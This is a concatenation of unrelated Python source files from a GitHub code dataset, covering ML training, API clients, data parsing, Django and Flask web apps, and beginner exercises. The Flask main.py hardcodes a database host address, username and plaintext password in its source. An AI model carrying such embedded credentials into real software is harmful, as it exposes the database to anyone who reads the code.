AND host_id=?\", trialID, experimentID, containerID, hostID) \\\n .filter(lambda r: r[\"memory_usage\"] is not None) \\\n .map(lambda r: (r['memory_usage'], 1)) \\\n .repartition(sc.defaultParallelism * partitionsPerCore) \\\n .cache()\n \n #Create Cassandra query\n query = createQuery(dataRDD, sc, cassandraKeyspace, experimentID, trialID, containerID, containerName, hostID)\n \n #Save to Cassandra\n sc.parallelize(query, sc.defaultParallelism * partitionsPerCore).saveToCassandra(cassandraKeyspace, destTable)\n \nif __name__ == '__main__':\n main()","repo_name":"benchflow/analysers","sub_path":"analysers/trials/ram.py","file_name":"ram.py","file_ext":"py","file_size_in_byte":5328,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"24105067754","text":"import torch\nfrom torchvision import datasets, transforms\nimport matplotlib.pyplot as plt\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport torch.optim as optim\n\ntransform = transforms.Compose([transforms.ToTensor(),\n transforms.Normalize((0.5,), (0.5,))\n ])\n\n# Download and load the training data\ntrainset = datasets.FashionMNIST('MNIST_data/', download = True, train = True, transform = transform)\ntestset = datasets.FashionMNIST('MNIST_data/', download = True, train = False, transform = transform)\ntrainloader = torch.utils.data.DataLoader(trainset, batch_size = 64, shuffle = True)\ntestloader = torch.utils.data.DataLoader(testset, batch_size = 64, shuffle = True)\n\ndevice = torch.device(\"cuda:0\")\n\n\n\nclass ConvNN(nn.Module):\n def __init__(self):\n super(ConvNN, self).__init__()\n self.conv1 = nn.Conv2d(1, 32, 3, padding=1) #32x14x14\n self.conv1_2 = nn.Conv2d(32, 32, 3, padding=1)\n self.bn1 = nn.BatchNorm2d(32)\n self.conv2 = nn.Conv2d(32, 64, 3, padding=1) #64x7x7\n self.conv2_2 = nn.Conv2d(64, 64, 3, padding=1)\n self.bn2 = nn.BatchNorm2d(64)\n self.maxpool = nn.MaxPool2d(2, 2)\n self.conv3 = nn.Conv2d(64, 128, 3, padding=1) #128x7x7\n self.conv3_2 = nn.Conv2d(128, 128, 3, padding=1)\n self.bn3 = nn.BatchNorm2d(128)\n self.conv4 = nn.Conv2d(128, 256, 3, padding=1)\n self.conv4_2 = nn.Conv2d(256, 256, 7) #256x1x1\n self.bn4 = nn.BatchNorm2d(256)\n self.fc1 = nn.Linear(256, 64)\n self.fc2 = nn.Linear(64, 10)\n\n def forward(self, x):\n x = F.leaky_relu(self.conv1(x), negative_slope=0.01)\n x = F.leaky_relu(self.maxpool(self.bn1(self.conv1_2(x))), negative_slope=0.01)\n x = F.leaky_relu(self.conv2(x), negative_slope=0.01)\n x = F.leaky_relu(self.maxpool(self.bn2(self.conv2_2(x))), negative_slope=0.01)\n x = F.leaky_relu(self.conv3(x), negative_slope=0.01)\n x = F.leaky_relu(self.bn3(self.conv3_2(x)), negative_slope=0.01)\n x = F.leaky_relu(self.conv4(x), negative_slope=0.01)\n x = F.leaky_relu(self.bn4(self.conv4_2(x)), negative_slope=0.01)\n x = x.view(x.size(0), -1)\n x = F.leaky_relu(self.fc1(x), negative_slope=0.01)\n x = self.fc2(x)\n\n return x\n\n#model = Network()\nmodel = ConvNN()\n\nmodel = model.to(device)\n\ncriterion = nn.CrossEntropyLoss()\n\n# Define the optimizer\noptimizer = optim.SGD(model.parameters(), lr = 0.0014)\n\nepochs = 35\n\ntrain_losses, test_losses = [], []\n\nfor e in range(epochs):\n running_loss = 0\n for images, labels in trainloader:\n\n images, labels = images.to(device), labels.to(device)\n # Training pass\n optimizer.zero_grad()\n\n output = model.forward(images)\n loss = criterion(output, labels)\n loss.backward()\n optimizer.step()\n\n running_loss += loss.item()\n else:\n test_loss = 0\n accuracy = 0\n\n # Turn off 
gradients for validation, saves memory and computation\n with torch.no_grad():\n # Set the model to evaluation mode\n model.eval()\n\n # Validation pass\n for images, labels in testloader:\n\n images, labels = images.to(device), labels.to(device)\n\n log_ps = model(images)\n test_loss += criterion(log_ps, labels)\n\n ps = torch.exp(log_ps)\n top_p, top_class = ps.topk(1, dim=1)\n equals = top_class == labels.view(*top_class.shape)\n accuracy += torch.mean(equals.type(torch.FloatTensor))\n\n model.train()\n train_losses.append(running_loss / len(trainloader))\n test_losses.append(test_loss / len(testloader))\n\n print(\"Epoch: {}/{}..\".format(e + 1, epochs),\n \"Training loss: {:.3f}..\".format(running_loss / len(trainloader)),\n \"Test loss: {:.3f}..\".format(test_loss / len(testloader)),\n \"Test Accuracy: {:.3f}\".format(accuracy / len(testloader)))\n\n\n","repo_name":"kyrylskichko/fashionMNIST_CNN","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4103,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"26548106921","text":"from http_client import (HTTPClient, HTTPRequestData)\nfrom typing import (Optional, Any, Dict, List)\nfrom config import BEARER_TOKEN\nfrom urllib.parse import parse_qsl\nimport asyncio\nimport json\n\nclass TweetSearchResponse:\n def __init__(self, data: List[str], next_token: str):\n self.data = data\n self.next_token = next_token\n\n def __repr__(self):\n return f'Response(data = {self.data}, next_token = {self.next_token})'\n\nclass TwitterSearchService:\n def __init__(self, query: str, max_item_count: int):\n self.http_client = HTTPClient()\n self.bearer_token = BEARER_TOKEN\n self.next_token = ''\n self.query = query\n self.max_item_count = max_item_count\n self.__lock = asyncio.Lock()\n\n def __make_search_data(self, tweet: Any) -> str:\n text = tweet['text']\n\n if 'extended_tweet' in tweet:\n text = tweet['extended_tweet']['full_text']\n elif 'retweeted_status' in tweet:\n text = tweet['retweeted_status']['text']\n if 'extended_tweet' in tweet['retweeted_status']:\n text = tweet['retweeted_status']['extended_tweet']['full_text']\n\n return text\n\n async def __get_recent_tweet_search(self, params: Dict[str, any]) -> Optional[TweetSearchResponse]:\n headers: Dict[str, str] = {\n 'Authorization': f'Bearer {self.bearer_token}' \n }\n\n request_data = HTTPRequestData(\n 'https://api.twitter.com/1.1',\n path='/tweets/search/30day/dev.json',\n method='GET',\n params=params,\n headers=headers\n )\n\n json = await self.http_client.request(request_data)\n if json is None:\n return None\n\n if 'next' not in json:\n return None\n\n self.next_token = json['next']\n \n tweets = []\n tweets_temp = list(map(self.__make_search_data, json['results']))\n\n for t in tweets_temp:\n if t not in tweets:\n tweets.append(t)\n\n return TweetSearchResponse(data=tweets, next_token=self.next_token)\n\n async def get_next_results(self) -> Optional[TweetSearchResponse]:\n async with self.__lock:\n param = {\n 'query': f'\\\"{self.query}\\\" lang:id',\n 'maxResults': self.max_item_count\n }\n\n if self.next_token:\n param['next'] = self.next_token\n\n return await self.__get_recent_tweet_search(param)","repo_name":"99ridho/twitter-crawl","sub_path":"twitter_search_service.py","file_name":"twitter_search_service.py","file_ext":"py","file_size_in_byte":2502,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"42102623040","text":"# programmers 
- Lv1 - Divisible Numbers (2020-09-10)\n# https://programmers.co.kr/learn/courses/30/lessons/12903\n\nimport sys\nsys.stdin = open(\"programmers/[Lv1]나누어떨어지는숫자.txt\",'r')\n\ndef solution(arr, divisor):\n    answer = []\n    arr.sort()\n    for a in arr:\n        if a % divisor == 0 :\n            answer.append(a)\n    if len(answer) == 0:\n        answer.append(-1) \n    \n    return answer\n\nT = int(input())\nfor _ in range(T):\n    arr = list(map(int, input().split()))\n    divisor = int(input())\n    \n    print(solution(arr, divisor)) \n\n","repo_name":"DailyCodingMem/DailyCoding","sub_path":"zjohn99/programmers/[Lv1]나누어떨어지는숫자.py","file_name":"[Lv1]나누어떨어지는숫자.py","file_ext":"py","file_size_in_byte":571,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"14840277284","text":"# main.py\nimport os\n\nimport pymysql\nfrom flask import render_template,request # request import added here (used below)\nfrom flask import Flask\n\n\napp = Flask(__name__)\n# env_config = os.getenv( \"PROD_APP_SETTINGS\" , \"config.DevelopmentConfig\" )\n# app.config.from_object(env_config)\n\nconn = pymysql.connect(\n    host='120.126.134.8',\n    user='admin',\n    password='g34552',\n    db='web',\n    charset='utf8',\n    port=3305\n\n)\n\n@app.route('/IR_public.html')\ndef index():\n    cur = conn.cursor()\n\n    sql = \"select * from iframe where page_type='data_campus'\"\n    cur.execute(sql)\n    content_campus = cur.fetchall()\n\n    sql2=\"select * from iframe where page_type='data_open'\"\n    cur.execute(sql2)\n    content_open=cur.fetchall()\n    return render_template('IR_public.html',content_campus=content_campus,content_open=content_open)\n\n\n@app.route('/data_campus.html')\ndef page_compus():\n    cur = conn.cursor()\n\n    sql = \"select * from iframe where page_type='data_campus'\"\n    cur.execute(sql)\n    content_campus = cur.fetchall()\n\n    sql2=\"select * from iframe where page_type='data_open'\"\n    cur.execute(sql2)\n    content_open=cur.fetchall()\n\n    # result=[]\n    # for row in content:\n    #     result.append(dict(zip([column[0] for column in cur.description],row)))\n    # json_data=json.dumps(result)\n    # json_data1 = json_data.encode('utf-8').decode('unicode_escape')\n    # print(content)\n\n    return render_template('data_campus.html',content_campus=content_campus,content_open=content_open)\n\n\n\n@app.route('/data_open.html')\ndef page_open():\n    cur = conn.cursor()\n\n    sql = \"select * from iframe where page_type='data_campus'\"\n    cur.execute(sql)\n    content_campus = cur.fetchall()\n\n    sql2=\"select * from iframe where page_type='data_open'\"\n    cur.execute(sql2)\n    content_open=cur.fetchall()\n    return render_template('data_open.html',content_campus=content_campus,content_open=content_open)\n\n\n\nif __name__ == \"__main__\":\n    # https://www.youtube.com/watch?v=AiUzsr5JZgQ\n    # from gevent import pywsgi\n    # server = pywsgi.WSGIServer(('0.0.0.0',5000),app)\n    # server.serve_forever()\n    app.run('0.0.0.0',debug=True)\n","repo_name":"choumienmien/HTML_IR","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"4956192386","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[1]:\n\nfrom LogDTClass import LogDT\nfrom MeasureSysConverter import MeasureSysConverter\nfrom PacketSessionInfo import PacketSessionInfo\nfrom ParseApplicationProtocol import ParseApplicationProtocol\n\ndef ParsePAA (line, logObj,packetDictionary):\n    dataOfPAA = ''\n    length = len(line)\n    packetConnectionContextID = 0\n    initiator = -1\n    protocolType = -1\n    headerCompression = -1\n    
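# -1 marks fields that have not (yet) been parsed from this record\n    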
compression = -1\n if 2 < length:\n NumberOfContextID = 0\n if line[2] != '':\n NumberOfContextID = int(line[2]) \n \n logObj.event = \"Packet Session Connection Attempt\"\n logObj.msgType = \"Setup\"\n logObj.time = line[1] \n if (3 < length) and (line[3] != '') :\n packetConnectionContextID = int(line[3]) \n dataOfPAA = 'Packet Connection ID: ' + str(packetConnectionContextID) + ';'\n if ((3 + NumberOfContextID) < length) and (line[3+NumberOfContextID] != '') :\n logObj.applicationProtocol = ParseApplicationProtocol(int(line[3 + NumberOfContextID])) #add\n if NumberOfContextID > 0:\n if packetConnectionContextID in packetDictionary:\n packetInfo = packetDictionary[packetConnectionContextID]\n else:\n packetInfo = PacketSessionInfo()\n packetDictionary[packetConnectionContextID] = packetInfo\n packetInfo = packetDictionary[packetConnectionContextID]\n packetInfo.AttemptTime = line[1]\n packetInfo.applicationProtocol = logObj.applicationProtocol\n if ((4 + NumberOfContextID) < length) and (line[4+NumberOfContextID] != '') :\n initiator = int(line[4+NumberOfContextID])\n if initiator == 1:\n logObj.PSInitiator = \"Mobile station initiated\"\n elif initiator == 2:\n logObj.PSInitiator = \"Network station initiated\"\n else:\n logObj.PSInitiator = \"Unknown\"\n dataOfPAA += 'Initiator: ' + logObj.PSInitiator + ';'\n if ((5 + NumberOfContextID) < length) and (line[5+NumberOfContextID] != '') :\n protocolType = int(line[5+NumberOfContextID])\n if protocolType == 1:\n logObj.PSProtocolType = \"Mobile station initiated\"\n else:\n logObj.PSProtocolType = \"Unknown\"\n dataOfPAA += 'Protocol Type: ' + logObj.PSInitiator + ';'\n if ((6 + NumberOfContextID) < length) and (line[6+NumberOfContextID] != '') and (line[6+NumberOfContextID] != '\"\"') :\n logObj.APN = line[6+NumberOfContextID]\n dataOfPAA += 'APN: ' + logObj.APN + ';'\n if ((7 + NumberOfContextID) < length) and (line[7+NumberOfContextID] != '') and (line[7+NumberOfContextID] != '\"\"'):\n logObj.staticIP = line[7+NumberOfContextID]\n dataOfPAA += 'Static IP: ' + logObj.staticIP + ';'\n if ((8 + NumberOfContextID) < length) and (line[8+NumberOfContextID] != '') :\n headerCompression = int(line[8+NumberOfContextID])\n if headerCompression == 0:\n logObj.HeaderCompression = \"Off\"\n elif headerCompression == 1:\n logObj.HeaderCompression = \"On (manufacturer preferred compression) \"\n elif headerCompression == 2:\n logObj.HeaderCompression = \"RFC1144 (VanJacobsen)\"\n elif headerCompression == 3:\n logObj.HeaderCompression = \"RFC2507 (Degermark)\"\n elif headerCompression == 4:\n logObj.HeaderCompression = \"RFC3095 (RoHC)\"\n else:\n logObj.HeaderCompression = \"Unknown\"\n dataOfPAA += 'Header Compression: ' + logObj.HeaderCompression + ';'\n if ((9 + NumberOfContextID) < length) and (line[9+NumberOfContextID] != '') :\n compression = int(line[9+NumberOfContextID])\n if compression == 0:\n logObj.compression = \"Off\"\n elif compression == 1:\n logObj.compression = \"On (manufacturer preferred compression) \"\n elif compression == 2:\n logObj.compression = \"V.42bis\"\n elif compression == 3:\n logObj.compression = \"V.44\"\n else:\n logObj.HeaderCompression = \"Unknown\"\n dataOfPAA += 'Compression: ' + logObj.compression + ';'\n logObj.eventInfo = dataOfPAA\n return 1 \n else:\n return 0\n# except:\n# return 0 \n\n\n# In[ 
]:\n\n\n\n\n","repo_name":"erssebaggala/Parser","sub_path":"ParsePAA.py","file_name":"ParsePAA.py","file_ext":"py","file_size_in_byte":4519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"10872115710","text":"from math import log\n\n\n########################################### POINTWISE ############################################\n\nlog_base = 2\n\ndef h(pr,a,logbase=2):\n # h(a)\n return -1*log(pr[a], logbase)\n\ndef h_cond(pr,a,b):\n # h(a|b)\n return -1*log(pr[a + ',' + b]/pr[b], log_base)\n\ndef info(pr,a,b):\n # i(a,b)\n return log(pr[a + ',' + b]/(pr[a]*pr[b]), log_base)\n\n\n########################################### PARTIAL ################################################\n\ndef i1(Pr,Al,a,b,inst):\n # just renaming\n return partial_info(Pr,Al,a,b,inst)\n\ndef i3(Pr,Al,a,b,inst):\n # from D.A. Butts, Network (2003)\n # \"stimulus-specific information\"\n num_inst = len(Al['y'])\n i3=0\n for j in range(num_inst):\n #if Al[a][j]==Al[a][inst]: #incld Al[a][inst]==Al[a][inst]\n i3 += Pr[j][a+','+b]/Pr[j][a] * i2(Pr,Al,a,b,j)\n # TODO: not quite, return to this though\n\n\ndef partial_info(Pr,Al,a,b,inst):\n # ie i1\n # |i(a,b)>b\n # Al[i]['x1'] = digit of input 1 at instance i\n i = info(Pr[inst],a,b)\n\n num_inst = len(Al['y'])\n num = 1\n bb = b.split(',')\n if len(bb) == 1:\n for j in range(num_inst):\n if inst != j and Al[bb[0]][j] == Al[bb[0]][inst]:\n i += info(Pr[j],a,b)\n num += 1\n else:\n assert(len(bb)==2)\n for j in range(num_inst):\n if inst != j and Al[bb[0]][j] == Al[bb[0]][inst] and Al[bb[1]][j] == Al[bb[1]][inst]:\n i += info(Pr[j],a,b)\n num += 1\n i /= num\n return i\n\n\ndef i2(Pr, Al, a, b, inst):\n # from DeWeese & Meister, I(A;B_inst)\n Hx = H(Pr,a)\n #if a=='x1,x2': Hx=H(Pr,a,logbase=4)\n num_inst = len(Al['y'])\n num = 1\n \n hx_y = h_cond(Pr[inst],a,b)\n bb = b.split(',')\n\n\n if len(bb) == 1:\n for j in range(num_inst):\n if inst != j and Al[b][j] == Al[b][inst]:\n hx_y += h_cond(Pr[j],a,b)\n num += 1\n else:\n assert(len(bb) == 2)\n for j in range(num_inst):\n if inst != j and Al[bb[0]][j] == Al[bb[0]][inst] and Al[bb[1]][j] == Al[bb[1]][inst]:\n hx_y += h_cond(Pr[j],a,b)\n num += 1\n\n hx_y /= num\n return Hx - hx_y\n\n\ndef non_Markv_dist_cond(pr, a,b,c):\n full_h_cond = h_cond(pr, a, b+',' +c)\n h_a = h(pr,a)\n markv_fwd = -1*log(pr[a+','+b]/pr[b] * pr[b+','+c]/pr[c],2)\n markv_rev = -1*log(pr[c+','+b]/pr[b] * pr[b+','+a]/pr[a],2)\n #print(markv_fwd,markv_rev)\n #return markv_fwd-markv_rev\n #return h_a - full_h_cond\n return markv_fwd - full_h_cond\n\n\ndef partial_info_1of3(Pr,Al,a,b,c,inst):\n # |i(a,bc)>c\n # Al[i]['x1'] = digit of input 1 at instance i\n # shit naming\n i = info(Pr[inst],a,b + ',' + c)\n\n num_inst = len(Al['y'])\n num = 1\n bb = b.split(',')\n assert( len(bb) == 1 ) #since bc is a unit\n\n for j in range(num_inst):\n if inst != j and Al[c][j] == Al[c][inst]:\n i += info(Pr[j],a,b + ',' + c)\n num += 1\n\n i /= num\n return i\n\n\n########################################### WHOLE #################################################\n\ndef H(Pr, a, logbase=2):\n num_inst = len(Pr)\n H = sum(h(Pr[i], a,logbase=logbase) for i in range(num_inst)) / num_inst\n return H\n\ndef H_cond(Pr,a,b):\n num_inst = len(Pr)\n H = sum(h_cond(Pr[i],a,b) for i in range(num_inst)) / num_inst\n return H\n\ndef Info(Pr,a,b):\n num_inst = len(Pr)\n I = sum(info(Pr[i],a,b)for i in range(num_inst)) / num_inst\n return 
I\n\n\n\n","repo_name":"chopper6/Info","sub_path":"src/info_fns.py","file_name":"info_fns.py","file_ext":"py","file_size_in_byte":3520,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"26160338113","text":"nome = 'Joel'\r\nidade = 28\r\nnota = 8.5\r\ngosto_naranja = True\r\n\r\nprint('Oi, meu nome é', nome, ', tenho', idade, 'anos de idade.' +\r\n '\\nMinha nota em Matemática é', nota, 'e é', gosto_naranja, 'que eu gosto de laranjas.')\r\n\r\n# or\r\n\r\nprint(f'\\nHi, my name is {nome}, I have {idade} years old. + \\nMy grade in Math is {nota} and it is {gosto_naranja} that I like oranges.')\r\n\r\n\r\n#Associe uma variável k ao valor 8. Associe uma variável quadrado_k ao quadrado do valor associado à variável k.\r\nk = 8\r\nquadrado_k = k**2\r\nprint(quadrado_k)\r\n\r\n'''Associe uma váriavel z ao valor 256. \r\nAssocie uma variável divisao_zk ao resultado da divisão entre os valores associados às variáveis z e k.'''\r\nz = 256\r\ndivisao_zk = z/k\r\nprint(divisao_zk) ","repo_name":"gabrielcampanile/Python_Exercises","sub_path":"UNIFESP Python/01/exs03.py","file_name":"exs03.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"pt","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"14080607905","text":"# Codes and information scraped (2011-10-28) from:\n# http://epp.eurostat.ec.europa.eu/statistics_explained/index.php/Glossary:Country_codes\n\nMEMBER_STATES = (\n 'AT',\n 'BE',\n 'BG',\n 'CY',\n 'CZ',\n 'DE',\n 'DK',\n 'EE',\n 'EL',\n 'ES',\n 'FI',\n 'FR',\n 'HU',\n 'IE',\n 'IT',\n 'LT',\n 'LU',\n 'LV',\n 'MT',\n 'NL',\n 'PL',\n 'PT',\n 'RO',\n 'SE',\n 'SI',\n 'SK',\n 'UK', \n)\n\ndef is_member(iso_code, member_states=MEMBER_STATES):\n \"\"\"Return a boolean indicating whether country represented by `iso_code`\n is a member of the EU.\n\n >>> is_member('SE')\n True\n >>> is_member(u'SE')\n True\n >>> is_member('US')\n False\n >>> is_member('JP')\n False\n\n \"\"\"\n return iso_code in member_states\n\nif __name__ == '__main__':\n import doctest\n doctest.testmod()\n","repo_name":"strange/django-country-utils","sub_path":"country_utils/eu.py","file_name":"eu.py","file_ext":"py","file_size_in_byte":842,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"76"} +{"seq_id":"4719389075","text":"# module imports\nimport os\nimport csv\n#\n#\ncvspath = os.path.join(\"..\", \"PyPoll\", \"Resources\", \"PyPoll_Resources_election_data.csv\")\n# set variables\n#\n# Specify the file to write to\ntexttosave = os.path.join(\"..\", \"PyPoll\", \"Analysis\", \"Analysis_Election.txt\")\n#\ntot_votes = 0\ncandidate = \"\" \ncandidate_list = []\nvote_list = {}\npercent_lis =[]\nwinner = \"\"\nvote_ratio = 0\nvote_percent = 0\nwin_count = 0\n#\n#open CVS file\nwith open(cvspath, newline=\"\") as csvfile:\n\tcsvreader = csv.reader(csvfile, delimiter=\",\")\n\t# \n\t# read the header row\n\tcsv_header = next(csvreader)\n\t#\n\t#read each row of sheet\n\tfor row in csvreader:\n\n\t\t#count the total voters\n\t\ttot_votes += 1\n\n\t\tif row[2] not in candidate_list:\n\t\t\tcandidate_list.append(row[2])\n\t\t\tvote_list[row[2]]=0\n\t\t\n\t\tvote_list[row[2]] += 1\n\nprint(\"Election Results\")\nprint(\"------------------------\")\nprint(f\"Total Votes {tot_votes}\")\nprint(\"------------------------\")\nwith open(texttosave,\"w\") as textfile:\n Summary = (f\"\\nElection Results\\n\"\n f\"----------------------------------\\n\"\n f\"\\nTotal tot_votes: 
{tot_votes}\\n\"\n               f\"----------------------------------\\n\")\n    textfile.write(Summary)\n\n    for candname,votecnt in vote_list.items(): \n        votecnt = vote_list.get(candname)\n        vote_ratio = float(votecnt)/float(tot_votes) * 100 \n\n        if (votecnt > win_count):\n            win_count = votecnt\n            winner = candname\n\n        print (f\"{candname}:{vote_ratio:.3f}% ({votecnt})\")\n        textfile.write(f\"{candname}:{vote_ratio:.3f}% ({votecnt})\\n\")\n    print (\"------------------------\")\n    # find winner\n    \n    print(f\"Winner:{winner}\")\n\n    Summary1 = (\n        f\"--------------------------------\\n\" \n        f\"\\nWinner: {winner}\\n\"\n        )\n    textfile.write(Summary1)\n\n\n\n\n\n\n\n\n","repo_name":"ghhyc/Python-Chanllenges","sub_path":"PyPoll/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":1763,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"18048688696","text":"from django.shortcuts import render,redirect\nfrom django.contrib import messages\nfrom .models import *\nfrom django.http import JsonResponse\n \n# Create your views here.\n\ndef home(request):\n    return render(request, \"store/index.html\")\n\ndef collections(request):\n    category = Category.objects.filter()\n    context = {'category':category}\n    return render(request, \"store/collections.html\",context)\n\n\ndef collectionsview(request,slug):\n    if(Category.objects.filter(slug=slug)):\n        prod = Product.objects.filter(subcategory__slug=slug)\n        cname = Category.objects.filter(slug=slug).first()\n        context = {'prod' : prod,'cname':cname}\n        return render(request, \"store/products/index.html\",context)\n    else:\n        messages.warning(request, \"category not found \")\n        return redirect('collections')\n    \ndef productview(request,cat_slug,prod_slug ):\n    if(Category.objects.filter(slug=cat_slug)):\n        if(Product.objects.filter(slug=prod_slug,status=0)):\n            prod = Product.objects.filter(slug=prod_slug,status=0).first()\n            context = {'prod':prod}\n        else:\n            messages.error(request,\"Product not found\")\n            return redirect('collections')\n    else:\n        messages.error(request,\"Category not found\")\n        return redirect('collections')\n    return render(request, \"store/products/info.html\", context)\n\ndef prodlist(request):\n    products = Product.objects.filter(status=0).values_list('name', flat=True)\n    prodlist = list(products)\n\n    return JsonResponse(prodlist, safe=False)\n\ndef searchproduct(req):\n    if req.method == 'POST':\n        q = req.POST.get('productsearch')\n        product = Product.objects.filter(name__contains=q).first()\n        if product:\n            return redirect('collections/'+product.subcategory.slug+'/'+product.slug)\n        else:\n            messages.info(req, \"No product found with that name\")\n            return redirect(req.META.get('HTTP_REFERER'))\n    return redirect(req.META.get('HTTP_REFERER'))\n","repo_name":"zakaria0101/ecommerce-django","sub_path":"store/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2010,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"18822071909","text":"import pandas as pd\nimport gzip\n\ninteresting = set(line.split()[0]\n                  for line in\n                  gzip.open('./GMGC10.data/GMGC10.card_resfam.tsv.gz', 'rt')\n                  if line[0] != '#')\n\nfirst_write = True\nwith gzip.open('selected.tsv.gz', 'wb') as out:\n    for ch in pd.read_table('./GMGC10.data/GMGC10.sample-abundance.tsv.xz', index_col=0, chunksize=1_000_000):\n        ch = ch[ch.index.map(interesting.__contains__)]\n        if len(ch) == 0: continue\n        ch.to_csv(out, sep='\\t', header=first_write)\n        first_write = 
False\n","repo_name":"BigDataBiology/VideoTutorials","sub_path":"5__SelectGMGCAbundances/select-lines.py","file_name":"select-lines.py","file_ext":"py","file_size_in_byte":559,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"10061000148","text":"'''\r\nApplication that bounce circle from window borders\r\n- ruch odbijania sie w x - okey\r\n- ruch odbijania sie w y - okey\r\n- ruch odbijania sie w x i y - okey\r\n- tworzenie klas i obiektow - tzw. refaktoring\r\n\r\n'''\r\n\r\nimport graphics\r\nfrom random import randint\r\nfrom time import sleep\r\n\r\n\r\ndef move_object_by_step(figure: graphics.Circle, dx: int = 1, dy: int = 1, repetitions: int = 10):\r\n    while True:\r\n\r\n        currentFigureCenter = figure.getCenter()\r\n        print(currentFigureCenter.x, currentFigureCenter.y)\r\n\r\n        if (currentFigureCenter.x + circleRadius >= winMain.getWidth()):\r\n            dx = -dx\r\n        if (currentFigureCenter.x - circleRadius <= 0):\r\n            dx = -dx\r\n        if (currentFigureCenter.y + circleRadius >= winMain.getHeight()):\r\n            dy = -dy\r\n        if (currentFigureCenter.y - circleRadius <= 0):\r\n            dy = -dy\r\n        figure.move(dx, dy)\r\n        if (winMain.checkMouse()) != None:\r\n            break\r\n        sleep(0.03)\r\n\r\n\r\n\r\n\r\n#window parameters\r\nwindowWidth = 400\r\nwindowHeight = windowWidth\r\nwinMain = graphics.GraphWin(\r\n    title='Bounce', width=windowWidth, height=windowHeight)\r\nwinMainColor = graphics.color_rgb(100, 200, 100)\r\nwinMain.setBackground(winMainColor)\r\n\r\n#picking up point for start\r\nmessage = graphics.Text(graphics.Point(\r\n    winMain.getWidth()/2, 10), 'Click on place to start bouncing ball.')\r\nmessage.draw(winMain)\r\n\r\ncircleCenterPickUp = winMain.getMouse()\r\n\r\n#circle parameters and drawing first circle\r\ncircleRadius = randint(5, 40)\r\ncircleCenter = graphics.Point(\r\n    randint(circleRadius, winMain.width -\r\n            circleRadius), randint(circleRadius, winMain.height - circleRadius))\r\ncircle = graphics.Circle(circleCenterPickUp, circleRadius)\r\ncircleColor = graphics.color_rgb(20, 120, 20)\r\ncircle.setFill(circleColor)\r\ncircle.draw(winMain)\r\n\r\n#some message\r\nmessage.setSize(8)\r\nmessage.setText('Click anywhere in window to close window. Sometimes, click few times.')\r\n\r\n#randomize increments in move\r\ndx = randint(1, 10)\r\ndy = randint(1, 10)\r\n\r\n\r\n#moving circle around\r\nmove_object_by_step(circle, dx, dy, 250)\r\n\r\n\r\n# program ending\r\nwinMain.close()\r\n","repo_name":"arek-zeg/Bouncing-Ball","sub_path":"myscript_concept.py","file_name":"myscript_concept.py","file_ext":"py","file_size_in_byte":2154,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"27951958740","text":"#!/usr/bin/env python3\r\n# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Thu Jul 22 15:12:59 2021\r\n\r\n@author: paco\r\n\"\"\"\r\n\r\n'''How to draw vectors\r\nfrom https://www.geeksforgeeks.org/quiver-plot-in-matplotlib/\r\n'''\r\n\r\n# Import libraries\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\n# Creating arrow\r\nx_pos = [0, 0] #first number corresponds 1 vector. 2 numbers? will draw 2 vectors\r\ny_pos = [0, 0]\r\nx_direct = [1, 0]\r\ny_direct = [1, -1]\r\n\r\n# Creating plot\r\nfig, ax = plt.subplots(figsize = (12, 7))\r\nax.quiver(x_pos, y_pos, x_direct, y_direct,\r\n\t\tscale = 5) #quiver gets 4 arguments: an origin, a direction. 
In this case a scale to match the axis scale\n\nax.axis([-1.5, 1.5, -1.5, 1.5])\n\n# show plot\nplt.show()\n","repo_name":"fra-mar/atmospheric_reentry_sim","sub_path":"tests/test_rotation/test_drawing_vectors.py","file_name":"test_drawing_vectors.py","file_ext":"py","file_size_in_byte":692,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"358796922","text":"import heapq\n\n# using maxHeap\n\n\ndef KClosest(nums, x, k):\n maxHeap = []\n\n for i in range(len(nums)):\n heapq.heappush(maxHeap, ((-1) * abs(nums[i] - x), nums[i]))\n\n if len(maxHeap) > k:\n heapq.heappop(maxHeap)\n\n return [closest[1] for closest in maxHeap]\n\n\n# KClosest([5,6,7,9,10],7,3)\n# print(KClosest([5, 6, 7, 8, 9], 7, 3))\n","repo_name":"dikshap07/Algorithms-and-Data-Structures","sub_path":"src/KClosestElements.py","file_name":"KClosestElements.py","file_ext":"py","file_size_in_byte":360,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"17932515810","text":"from PIL import Image\r\nimport numpy as np\r\nimport cv2\r\n\r\n__author__ = 'yonatan'\r\n__project__ = 'video_base'\r\n\r\n\r\n#class image_converter(object):\r\n# def __init__(self):\r\n# pass\r\n\r\ndef array2jpegBuffer(image):\r\n img_str = 